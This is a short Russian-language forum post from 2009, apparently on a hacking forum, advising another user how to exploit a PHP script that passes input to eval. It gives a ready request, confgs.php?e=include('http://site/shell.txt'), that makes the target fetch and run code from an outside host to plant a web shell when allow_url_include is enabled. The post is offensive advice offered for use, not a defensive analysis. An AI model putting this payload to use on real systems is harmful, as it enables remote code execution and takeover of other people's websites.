
09.12.2009, 17:48
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
eval позволяет выполнять php-код, ls - никакого отношения к php не имеет. Вывод - нужно написать PHP-код, с помощью которого можно будет залить шелл.
Например, если после просмотра phpinfo() там будет allow_url_include = ON, то можно так залить шелл:
confgs.php?e=include('http://site/shell.txt');
|
|
|